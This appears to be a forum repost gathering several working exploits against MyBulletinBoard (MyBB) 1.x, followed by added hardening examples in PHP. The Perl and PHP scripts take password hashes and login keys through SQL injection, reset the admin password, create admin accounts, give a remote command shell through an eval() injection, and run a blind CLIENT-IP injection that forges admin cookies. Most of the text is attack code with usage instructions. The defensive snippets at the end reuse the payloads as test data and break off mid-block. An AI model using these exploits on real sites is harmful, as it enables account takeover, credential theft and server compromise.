Greets to ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb
and anyone else who know me!
Greetings to Raido Kerna. Tervitusi Torufoorumi rahvale!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Homepage: http://www.janekvind.com/
Waraxe forum: http://www.waraxe.us/forums.html

---------------------------------- [ EOF ] ------------------------------------

# MyBulletinBoard (MyBB) <= 1.00 RC4 SQL Injection Exploit

#!/usr/bin/perl -w
#
# SQL Injection Exploit for MyBulletinBoard (MyBB) <= 1.00 RC4
# This exploit show the MD5 crypted password of the user id you've chose
# Related advisory:
# Patch: http://www.mybboard.com/community/showthread.php?tid=2559
# http://fain182.badroot.org
# http://www.codebug.org
# Discovered by Alberto Trivero and coded with FAiN182

use LWP::Simple;

print "\n\t===========================================\n";
print "\t= Exploit for MyBulletinBoard <= 1.00 RC4 =\n";
print "\t= Alberto Trivero & FAiN182 - codebug.org =\n";
print "\t===========================================\n\n";

if(!$ARGV[0] or !$ARGV[1]) {
print "Usage:\nperl $0 [full_target_path] [user_id]\n\nExample:\nperl $0 http://www.example.com/mybb/ 1\n";
exit(0);
}

$url = "calendar.php?action=event&eid='%20UNION%20SELECT%20uid,uid,null,null,null,null,password,null%20FROM%20mybb_users%20WHERE%20uid=$ARGV[1]/*";
$page = get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page =~ m/<td><strong>(.*?)<\/strong>/ && print "[+] User ID is: $1\n";
print "[-] Unable to retrieve User ID\n" if(!$1);
$page =~ m/<a href="member\.php\?action=profile&uid=">(.*?)<\/a>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);

# MyBulletinBoard (MyBB) <= 1.00 RC4 SQL Injection Exploit

# mybb is dead /str0ke

#!/usr/bin/perl
######################################################################################
# Crouz.Com Security Team #
######################################################################################
# EXPLOIT FOR: MyBulletinBoard Search.PHP SQL Injection Vulnerability #
# #
#Expl0it By: A l p h a _ P r o g r a m m e r (sirius) #
#Email: Alpha_Programmer@LinuxMail.ORG #
# #
#This Xpl Change Admin's Pass For L0gin With P0wer User #
# #
#HACKERS PAL & Devil-00 & ABDUCTER are credited with the discovery of this vuln #
# #
######################################################################################
# GR33tz T0 ==> mh_p0rtal -- Dr-CephaleX -- The-Cephexin -- Djay_Agoustinno #
# No_Face_King -- Behzad185 -- Autumn_Love6(Hey Man You Are Singular) #
# #
# Special Lamerz : Hoormazd & imm02tal ++ xshabgardx #
######################################################################################

use IO::Socket;

if (@ARGV < 2)
{
print "\n==========================================\n";
print " \n -- Exploit By Alpha Programmer(sirius) --\n\n";
print " Crouz Security Team \n\n";
print " Usage: <T4rg3t> <DIR>\n\n";
print "==========================================\n\n";
print "Examples:\n\n";
print " Mybb.pl www.Site.com /mybb/ \n";
exit();

}
my $host = $ARGV[0];
my $dir = $ARGV[1];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );
unless ($remote) { die "C4nn0t C0nn3ct to $host" }
print "C0nn3cted\n";
$http = "GET $dir/search.php?action=finduser&uid=-1' ; update mybb_users set username='da05581c9137f901f4fa4da5a958c273' , password='da05581c9137f901f4fa4da5a958c273' where usergroup=4 and uid=1 HTTP/1.0\n";
$http .= "Host: $host\n\n\n\n";
print "\n";
print $remote $http;
print "Wait For Changing Password ...\n";
sleep(10);
print "OK , Now Login With :\n";
print "Username: crouz\n";
print "Password: crouz\n\n";
print "Enjoy \n\n";

# MyBulletinBoard (MyBB) <= 1.03 Multiple SQL Injection Exploit

#!/bin/env perl
#//-------------------------------------------------------------#
#// MyBB Forum SQL Injection Exploit .. By HACKERS PAL #
#// Greets For Devil-00 - Abducter - Almaster - GaCkeR #
#// Special Greets For SG (SecurityGurus) Team And Members #
#// http://WwW.SoQoR.NeT #
#//-------------------------------------------------------------#

use LWP::Simple;
print "\n#####################################################";
print "\n# MyBB Forum Exploit By : HACKERS PAL #";
print "\n# Http://WwW.SoQoR.NeT #";
if(!$ARGV[0] or !$ARGV[1]) {
print "\n# -- Usage: #";
print "\n# -- perl $0 [Full-Path] [User ID] #";
print "\n# -- Example: #";
print "\n# -- perl $0 http://mods.mybboard.com/forum/ 1 #";
print "\n# Greets To Devil-00 - Abducter - GaCkeR #";
print "\n#####################################################";
exit(0);
}
else
{
print "\n# Greets To Devil-00 - Abducter - GaCkeR #";
print "\n#####################################################";
$web=$ARGV[0];
$id=$ARGV[1];
$url = "showteam.php?GLOBALS[]=1&comma=/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
$page =~ m/FROM (.*)users u WHERE/;
$prefix=$1;
if(!$1)
{
$prefix="mybb_";
}
$url =
"showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,username,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20".$prefix.
"users%20where%20uid=$id/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
print "\n[+] Connected to: $ARGV[0]\n";
print "[+] User ID is : $id ";
print "\n[+] Table Prefix is : $prefix";
$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "\n[+] User Name : $1";
print "\n[-] Unable to retrieve User Name\n" if(!$1);
$url =
"showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20".$prefix.
"users%20where%20uid=$id/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "\n[+] Md5 Hash of Password : $1\n";
die("\n[-] Unable to retrieve The Hash of password\n") if(!$1);
print"\n[!] Watch out ... The Cookie Value is comming\n";
$url =
"showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20".$prefix.
"users%20where%20uid=$id/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "[+] Cookie [mybbuser] Value:-\n[*] $id"."_"."$1\n";
print "[-] Unable to retrieve Login Key\n" if(!$1);
}

# MyBulletinBoard (MyBB) <= 1.03 (misc.php COMMA) SQL Injection

MyBB New SQL Injection

D3vil-0x1 < Devil-00 >

Milw0rm ID :-
http://www.milw0rm.com/auth.php?id=1320

The Inf.File :-
misc.php

Lines :-

$buddies = $mybb->user['buddylist'];
$namesarray = explode(",",$buddies);
if(is_array($namesarray))
{
while(list($key, $buddyid) = each($namesarray))
{
$sql .= "$comma'$buddyid'"; <== HERE: uncleared var !!
$comma = ",";
}
$timecut = time() - $mybb->settings['wolcutoff'];
$query = $db->query("SELECT u.*, g.canusepms FROM ".TABLE_PREFIX."users u LEFT JOIN ".TABLE_PREFIX."usergroups g ON (g.gid=u.usergroup) WHERE u.uid IN ($sql)");

Lines 255 to 265.

The GLOBALS unset function does not unset $_COOKIE,
so you can start attacking any var via cookies.

Tested on MyBB 1.3, register_globals = On.

Explorer Exploit :-

1- Log in with any username.
2- Create a new cookie (
name => "comma"
value => "comma=0)%20%3C%3E%200%20UNION%20ALL%20SELECT%201,loginkey,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,1 FROM mybb_users WHERE uid=1/*")

3- Visit the URL :-
HOST/PATH/misc.php?action=buddypopup

Where HOST = the victim server and PATH = the MyBB dir.

# MyBulletinBoard (MyBB) < 1.1.3 Remote Code Execution Exploit

#!/usr/bin/perl
# Tue Jun 13 12:37:12 CEST 2006 jolascoaga@514.es
#
# Exploit HOWTO - read this before you flood my Inbox, you *****!
#
# - First you need to create the special user; to do this use:
# ./mybibi.pl --host=http://www.example.com --dir=/mybb -1
# This step needs a graphic confirmation, so the exploit writes a file
# to /tmp/file.png; you need to
# view this image and type its text at the prompt. If everything is ok,
# you'll have a new valid user created.
# * There is a file mybibi_out.html where the exploit writes the output
# for debugging.
# - After you have created the user, or if you already have a valid ordinary
# user, you can execute shell commands.
#
# TIPS:
# * Sometimes you have to change the thread Id, --tid is your friend
# * Don't forget to change the email. You MUST activate the account.
# * Better karate, even inside you.
#
# LIMITATIONS:
# * If the admin has the username length < 28, this exploit doesn't work
#
# Greetz to !dSR ppl and unsec
#
# 514 still r0xing!

# user config.
my $uservar = "C"; # don't use large vars.
my $password = "514r0x";
my $email = "514\@mailinator.com";

use LWP::UserAgent;
use HTTP::Cookies;
use LWP::Simple;
use HTTP::Request::Common "POST";
use HTTP::Response;
use Getopt::Long;
use strict;

$| = 1; # unbuffered output

# The word "proxy" was masked as ***** by the forum's word filter; it is
# restored throughout (the LWP calls below leave no other reading).
my ($proxy, $proxy_user, $proxy_pass, $username);
my ($host, $debug, $dir, $command, $del, $first_time);
my ($logged, $tid) = (0, 2);

# The username is PHP source: once it lands unescaped in an eval()'d template,
# it runs system() on whatever the request header named $uservar contains.
$username = "'.system(getenv(HTTP_".$uservar.")).'";

my $options = GetOptions (
'host=s' => \$host,
'dir=s' => \$dir,
'proxy=s' => \$proxy,
'proxy_user=s' => \$proxy_user,
'proxy_pass=s' => \$proxy_pass,
'debug' => \$debug,
'1' => \$first_time,
'tid=s' => \$tid,
'delete' => \$del);

&help unless ($host); # please don't try this at home.

$dir = "/" unless($dir);
print "$host - $dir\n";
if ($host !~ /^http/) {
$host = "http://".$host;
}

LWP::Debug::level('+') if $debug;
my ($res, $req);

my $ua = new LWP::UserAgent(
cookie_jar=> { file => "$$.cookie" });
$ua->agent("Mothilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!");
$ua->proxy(['http'] => $proxy) if $proxy;
# set proxy credentials on the agent's default headers; $req is still undef here
$ua->default_headers->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;

create_user() if $first_time;

while () {
login() if !$logged;

print "mybibi> "; # lost connection
while(<STDIN>) {
$command=$_;
chomp($command);
last;
}
&send($command);
}

# Posts a thread preview; the command travels in the request header named
# $uservar and runs server-side when the poisoned username hits eval().
sub send {
chomp (my $cmd = shift);
my $h = $host.$dir."/newthread.php";
my $req = POST $h, [
'subject' => '514',
'message' => '/slap 514',
'previewpost' => 'Preview Post',
'action' => 'do_newthread',
'fid' => $tid,
'posthash' => 'e0561b22fe5fdf3526eabdbddb221caa'
];
$req->header($uservar => $cmd);
print $req->as_string() if $debug;
my $res = $ua->request($req);
if ($res->content =~ /You may not post in this/) {
print "[!] don't have perms to post. Change the Forum ID\n";
} else {
my ($data) = $res->content =~ m/(.*?)\<\!DOCT/is;
print $data;
}

}
sub login {
my $h = $host.$dir."/member.php";
my $req = POST $h,[
'username' => $username,
'password' => $password,
'submit' => 'Login',
'action' => 'do_login'
];
my $res = $ua->request($req);
if ($res->content =~ /You have successfully been logged/is) {
print "[*] Login successful!\n";
$logged = 1;
} else {
print "[!] Error logging in\n";
}
}

sub help {
print "Syntax: ./$0 --host=url --dir=/mybb [options] -1 --tid=2\n";
print "\t--proxy (http), --proxy_user, --proxy_pass\n";
print "\t--debug\n";
print "the default directory is /\n";
print "\nExample\n";
print "bash# $0 --host=http(s)://www.server.com/\n";
print "\n";
exit(1);
}

sub create_user {
# firs we need to get the img.
my $h = $host.$dir."/member.php";
print "Host: $h\n";

$req = HTTP::Request->new (GET => $h."?action=register");
$res = $ua->request ($req);

my $req = POST $h, [
'action' => "register",
'agree' => "I Agree"
];
print $req->as_string() if $debug;
$res = $ua->request($req);

my $content = $res->content();
$content =~ m/.*(image\.php\?action.*?)\".*/is;
my $img = $1;
my $req = HTTP::Request->new (GET => $host.$dir."/".$img);
$res = $ua->request ($req);
print $req->as_string();

if ($res->content) {
open (TMP, ">/tmp/file.png") or die($!);
print TMP $res->content;
close (TMP);
print "[*] /tmp/file.png created.\n";
}

my ($hash) = $img =~ m/hash=(.*?)$/;
my $img_str = get_img_str();
unlink ("/tmp/file.png");
$img_str =~ s/\n//g;
my $req = POST $h, [
'username' => $username,
'password' => $password,
'password2' => $password,
'email' => $email,
'email2' => $email,
'imagestring' => $img_str,
'imagehash' => $hash,
'allownotices' => 'yes',
'receivepms' => 'yes',
'pmpopup' => 'no',
'action' => "do_register",
'regsubmit' => "Submit Registration"
];
$res = $ua->request($req);
print $req->as_string() if $debug;

open (OUT, ">mybibi_out.html");
print OUT $res->content;

print "Check $email for confirmation or mybibi_out.html if there are some error\n";
}

sub get_img_str
{
print "\nNow I need the text shown in /tmp/file.png: ";
my $str = <STDIN>;
return $str;
}
exit 0;

# MyBulletinBoard (MyBB) <= 1.1.3 (usercp.php) Create Admin Exploit

#!/usr/bin/perl
# MyBulletinBoard (MyBB) <= 1.1.3 Create An Admin Exploit
#
# www.h4ckerz.com / hackerz.ir / aria-security.net / Myimei.com /
# ./2006-6-23
### Coded By Hessam-x / Hessamx-at-Hessamx.net

use IO::Socket;
use LWP::UserAgent;
use HTTP::Cookies;


$host = $ARGV[0];
$uname = $ARGV[1];
$passwd = $ARGV[2];
$url = "http://".$host;

print q(
###########################################################
# MyBulletinBoard (MyBB) <= 1.1.3 Create An Admin Exploit #
# www.hackerz.ir - www.h4ckerz.com #
################### Coded By Hessam-x #####################

);



if (@ARGV < 3) {
print " # usage : hx.pl [host&path] [uname] [pass]\n";
print " # E.g : hx.pl www.milw0rm.com/mybb/ str0ke 123456\n";
exit();
}

print " [~] User/Password : $uname/$passwd \n";
print " [~] Host : $host \n";
print " [~] Login ... ";



$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();

$xpl->cookie_jar( $cookie_jar );
$res = $xpl->post($url.'member.php',
Content => [
"action" => "do_login",
"username" => "$uname",
"password" => "$passwd",
"submit" => "Login",
],);

if($cookie_jar->as_string =~ /mybbuser=(.*?);/) {
print "successfully .\n";
} else {
print "UNsuccessfully !\n";
print " [-] Can not Login In $host !\n";
exit();
}

$req = $xpl->get($url.'usercp.php?action=do_options&showcodebuttons=1\',additionalgroups=\'4');
$tst = $xpl->get($url.'index.php');
if ($tst->as_string =~ /Admin CP/) {
print " [+] You Are Admin Now !!";
} else {
print " [-] Exploit Failed !";
}

# MyBulletinBoard (MyBB) <= 1.1.5 (CLIENT-IP) SQL Injection Exploit

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "MyBulletinBoard (MyBB) <= 1.1.5 'CLIENT-IP' SQL injection / create new admin exploit\n";
echo "by rgod rgod@autistici.org\n";
echo "site: http://retrogod.altervista.org\n";
echo "dork, version specific: \"Powered By MyBB\" \"2006 MyBB Group\"\n\n";
/*
works regardless of php.ini settings
*/
if ($argc<3) {
echo "Usage: php ".$argv[0]." host path OPTIONS\n";
echo "host: target server (ip/hostname)\n";
echo "path: path to MyBB\n";
echo "Options:\n";
echo " -T[prefix] specify a table prefix different from default (mybb_)\n";
echo " -u[number] specify a user id other than 1 (usually admin)\n";
echo " -p[port]: specify a port other than 80\n";
echo " -P[ip:port]: specify a proxy\n";
echo " -d: disclose table prefix (recommended)\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /MyBB/ -d\r\n";
echo "php ".$argv[0]." localhost /MyBB/ -Tmy_\r\n";
die;
}
/* software site: http://www.mybboard.com/

vulnerable code in inc/functions.php near lines 1292-1320:

...
function getip() {
global $_SERVER;
if($_SERVER['HTTP_X_FORWARDED_FOR'])
{
if(preg_match_all("#[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}#s", $_SERVER['HTTP_X_FORWARDED_FOR'], $addresses))
{
while(list($key, $val) = each($addresses[0]))
{
if(!preg_match("#^(10|172\.16|192\.168)\.#", $val))
{
$ip = $val;
break;
}
}
}
}
if(!$ip)
{
if($_SERVER['HTTP_CLIENT_IP'])
{
$ip = $_SERVER['HTTP_CLIENT_IP'];
}
else
{
$ip = $_SERVER['REMOTE_ADDR'];
}
}
return $ip;
}
...

you can spoof your ip address through the CLIENT-IP http header...
as a result you can inject sql statements in class_session.php at lines 36-68
by calling the main index.php script:
...
function init()
{
global $ipaddress, $db, $mybb, $noonline;
//
// Get our visitors IP
//
$this->ipaddress = $ipaddress = getip();

//
// User-agent
//
$this->useragent = $_SERVER['HTTP_USER_AGENT'];
if(strlen($this->useragent) > 100)
{
$this->useragent = substr($this->useragent, 0, 100);
}

//
// Attempt to find a session id in the cookies
//
if($_COOKIE['sid'])
{
$this->sid = addslashes($_COOKIE['sid']);
}
else
{
$this->sid = 0;
}

//
// Attempt to load the session from the database
//
$query = $db->query("SELECT sid,uid FROM ".TABLE_PREFIX."sessions WHERE sid='".$this->sid."' AND ip='".$this->ipaddress."'");
...

the injection is blind, but you can ask true/false questions of the database to
retrieve the admin loginkey.
Through that you can build an admin cookie and create a new admin user through
the admin/users.php script.
You can also disclose the table prefix.

--------------------------------------------------------------------------------


-*****************************************************************************-
* *
* Italy - Germany 2-0, at 114' maybe the most beautiful goal I have ever seen *
* thanks Grosso! *
* *
-*****************************************************************************-
*/

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
// "proxy" was masked as ***** by the forum's word filter; restored throughout.
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
// eregi() was removed in PHP 7; a plain substring test for the end of the headers is all that was needed
while ((!feof($ock)) or (strpos($html,"\r\n\r\n")===false)) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}

function make_seed()
{
list($usec, $sec) = explode(' ', microtime());
return (float) $sec + ((float) $usec * 100000);
}
srand(make_seed());
$anumber = rand(1,99999);

$host=$argv[1];
$path=$argv[2];
$port=80;
$prefix="mybb_";
$user_id="1";//admin
$proxy="";
$dt=0;
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
$prefix=str_replace("-T","",$argv[$i]);
}
if ($temp=="-u")
{
$user_id=str_replace("-u","",$argv[$i]);
}
if ($temp=="-d")
{
$dt=1;
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

if ($dt)
{
$sql="'suntzuuuu/*";
echo "sql -> ".$sql."\r\n";
$packet ="GET ".$p."index.php HTTP/1.0\r\n";
$packet.="CLIENT-IP: $sql\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
// the MySQL error page echoes the failing query, and with it the table prefix
if (stripos($html,"You have an error in your SQL syntax")!==false)
{
$temp=explode("sessions",$html);
$temp2=explode(" ",$temp[0]);
$prefix=$temp2[count($temp2)-1];
echo "prefix -> ".$prefix;if ($prefix==""){echo "[no prefix]";}echo"\n";
}
else
{
echo "unable to disclose table prefix...\n";
}
sleep(1);
}

$chars[0]=0;//null: SUBSTRING() past the end of loginkey gives ASCII('')=0, which ends the loop
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(65,90));//A-Z letters
$chars=array_merge($chars,range(97,122));//a-z letters
$j=1;
$loginkey="";
while (!strstr($loginkey,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$chars))
{
// boolean-blind oracle: the greeting appears only when the comparison is true;
// uid comes from -u (the original hard-coded uid=1 and ignored the option)
$sql="99999999' UNION SELECT ASCII(SUBSTRING(loginkey,".$j.",1))=".$i.",0 FROM ".$prefix."users WHERE uid=".$user_id."/*";
echo "sql -> ".$sql."\r\n";
$packet ="GET ".$p."index.php HTTP/1.0\r\n";
$packet.="CLIENT-IP: $sql\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (stripos($html,"Hello There")!==false) {$loginkey.=chr($i);echo "loginkey -> ".$loginkey."[???]\r\n";sleep(1);break;}
}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}
$cookie="mybbuser=".$user_id."_".trim(str_replace(chr(0),"",$loginkey))."; mybbadmin=".$user_id."_".trim(str_replace(chr(0),"",$loginkey)).";";
echo "admin cookie -> ".$cookie."\r\n";


$data='-----------------------------7d62702f250530
Content-Disposition: form-data; name="action";

do_add
-----------------------------7d62702f250530
Content-Disposition: form-data; name="userusername";

suntzu'.$anumber.'
-----------------------------7d62702f250530
Content-Disposition: form-data; name="newpassword";

suntzu'.$anumber.'
-----------------------------7d62702f250530
Content-Disposition: form-data; name="email";

suntzoi@suntzu.org
-----------------------------7d62702f250530
Content-Disposition: form-data; name="usergroup";

4
-----------------------------7d62702f250530
Content-Disposition: form-data; name="additionalgroups[]";

4
-----------------------------7d62702f250530
Content-Disposition: form-data; name="displaygroup";

4
-----------------------------7d62702f250530
Content-Disposition: form-data; name="Add User";

Add User
-----------------------------7d62702f250530--
';

$packet="POST ".$p."admin/users.php HTTP/1.0\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (stripos($html,"The user has successfully been added")!==false)
{
echo "exploit succeeded... now login as admin\n";
echo "with username \"suntzu".$anumber."\" and password \"suntzu".$anumber."\"\n";
}
else
{
echo "something goes wrong...\n";if(!$dt)echo "you may try -d option\n";
}
?>

src: Th3 0uTl4wS r3Fug3 -

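The waraxe advisory at the top of this post shows request data reaching eval() through $sortby. As an added example, written for this page and taken neither from the advisory nor from MyBB, here is that pattern beside a hardened version: $sortby is mapped onto a fixed whitelist before it is used, and the array assignment is done directly instead of through eval(). The sort-key list and the template text are assumptions for the example.

```php
<?php
// Added example (not MyBB code): the eval() pattern from the advisory beside a
// hardened version. $template stands in for the "forumdisplay_orderarrow"
// template; the keys in SORT_KEYS are an assumed whitelist.

function orderarrow_vulnerable(string $sortby, string $template): array
{
    $orderarrow = [];
    // Request data is spliced into PHP source and executed. With
    // sortby = "'];phpinfo();exit;//" the generated code becomes
    //   $orderarrow[''];phpinfo();exit;//'] = "...";
    eval("\$orderarrow['$sortby'] = \"" . $template . "\";");
    return $orderarrow;
}

const SORT_KEYS = ['subject', 'lastpost', 'replies', 'views', 'starter'];

function safe_sortby(string $sortby): string
{
    // Anything outside the whitelist falls back to the default; the raw
    // value never reaches a code path that interprets it.
    return in_array($sortby, SORT_KEYS, true) ? $sortby : 'lastpost';
}

function orderarrow_safe(string $sortby, string $template): array
{
    // A plain assignment does what the eval() did, without executing anything.
    return [safe_sortby($sortby) => $template];
}

$payload = "'];phpinfo();exit;//";
var_dump(safe_sortby($payload));                       // string(8) "lastpost"
var_dump(orderarrow_safe('views', '<img src="arrow.gif">'));
// orderarrow_vulnerable($payload, ...) is deliberately not called here: it
// would run phpinfo() and exit, which is exactly the advisory's point.
```

The whitelist is the real fix; escaping quotes in $sortby would still leave template text being compiled as code, and any later template or setting that interpolates user data would reopen the hole.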
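For the misc.php buddy-list injection (Devil-00's COMMA advisory), an added example that is not MyBB's code: the query built with an uninitialised $comma that register_globals lets a cookie pre-seed, beside a version that forces every id to an integer and builds the IN (...) list locally. The table and column names follow the snippet quoted in the advisory; the rest is illustrative. The same integer cast is the remedy for the numeric-id injections elsewhere in this post (calendar.php eid, search.php uid, usercp.php showcodebuttons), which are the same class of bug.

```php
<?php
// Added example (not MyBB code): the buddy-list query from the misc.php
// advisory, vulnerable and hardened. $globals stands in for the request data
// that register_globals=On turns into variables (here: a cookie named "comma").

function build_buddy_query_vulnerable(string $buddies, array $globals): string
{
    // $comma was never initialised in the original, so a cookie named "comma"
    // seeds it; the first loop iteration appends the attacker's text verbatim.
    $comma = $globals['comma'] ?? '';
    $sql = '';
    foreach (explode(',', $buddies) as $buddyid) {
        $sql .= "$comma'$buddyid'";
        $comma = ',';
    }
    return "SELECT u.*, g.canusepms FROM mybb_users u LEFT JOIN mybb_usergroups g "
         . "ON (g.gid=u.usergroup) WHERE u.uid IN ($sql)";
}

function build_buddy_query_safe(string $buddies): ?string
{
    // Every uid is forced to a positive integer, so nothing but digits can
    // appear in the IN (...) list, and the separator is chosen locally rather
    // than read from a variable that request data could pre-seed.
    $ids = [];
    foreach (explode(',', $buddies) as $buddyid) {
        $id = (int) $buddyid;
        if ($id > 0) {
            $ids[$id] = $id;   // also de-duplicates
        }
    }
    if ($ids === []) {
        return null;           // "IN ()" is a syntax error; skip the query instead
    }
    $list = implode(',', $ids);
    return "SELECT u.*, g.canusepms FROM mybb_users u LEFT JOIN mybb_usergroups g "
         . "ON (g.gid=u.usergroup) WHERE u.uid IN ($list)";
}

// The advisory's cookie payload, shortened: it closes IN (...) and appends a UNION.
$cookie = "0) <> 0 UNION ALL SELECT 1,loginkey,3 FROM mybb_users WHERE uid=1/*";
echo build_buddy_query_vulnerable('2,3', ['comma' => $cookie]), "\n";
// ... WHERE u.uid IN (0) <> 0 UNION ALL SELECT 1,loginkey,3 FROM mybb_users WHERE uid=1/*'2','3')

echo build_buddy_query_safe("2,3,0) UNION SELECT 1/*"), "\n";
// ... WHERE u.uid IN (2,3)
```

Even with the casts in place, turning register_globals off (or, on a PHP that still has it, unsetting request-derived variables including $_COOKIE before any code runs) is what closes the class of bug the advisory describes: any other uninitialised variable in the code base is one cookie away from the same outcome.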
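For rgod's CLIENT-IP advisory, an added example that is not MyBB's code: a getip() that honours forwarding headers only when the TCP peer is a configured proxy, validates whatever it picks as an IP address, and a session lookup that binds the value as a query parameter instead of interpolating it into the SQL as class_session.php did. The trusted-proxy list, the PDO handle and the mybb_sessions table name are assumptions for the example.

```php
<?php
// Added example (not MyBB code): a replacement for the getip() quoted in the
// advisory, plus a parameterised version of the sessions lookup it fed.
// TRUSTED_PROXIES and the PDO usage are assumptions for this example.

const TRUSTED_PROXIES = ['10.0.0.5', '10.0.0.6'];

function getip_safe(array $server): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (!in_array($remote, TRUSTED_PROXIES, true)) {
        // Direct client: CLIENT-IP / X-Forwarded-For are attacker-controlled,
        // so they are ignored and only the socket peer address is used.
        return filter_var($remote, FILTER_VALIDATE_IP) !== false ? $remote : '0.0.0.0';
    }
    // Behind a trusted proxy: take the first hop that is a valid public address.
    $candidates = [];
    if (isset($server['HTTP_X_FORWARDED_FOR'])) {
        $candidates = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR']));
    }
    if (isset($server['HTTP_CLIENT_IP'])) {
        $candidates[] = trim($server['HTTP_CLIENT_IP']);
    }
    foreach ($candidates as $ip) {
        if (filter_var($ip, FILTER_VALIDATE_IP,
                       FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) {
            return $ip;
        }
    }
    return $remote;   // nothing usable in the headers: fall back to the proxy's address
}

function load_session(PDO $db, string $sid, string $ip): ?array
{
    // Parameter binding: a value that slipped past validation still cannot
    // change the statement, so the true/false oracle the exploit relies on is gone.
    $stmt = $db->prepare('SELECT sid, uid FROM mybb_sessions WHERE sid = :sid AND ip = :ip');
    $stmt->execute([':sid' => $sid, ':ip' => $ip]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// The advisory's payload arrives as a CLIENT-IP header from a direct client
// (constructed request environment):
$env = [
    'REMOTE_ADDR'    => '203.0.113.9',
    'HTTP_CLIENT_IP' => "99999999' UNION SELECT 1,0 FROM mybb_users WHERE uid=1/*",
];
var_dump(getip_safe($env));   // string(11) "203.0.113.9"

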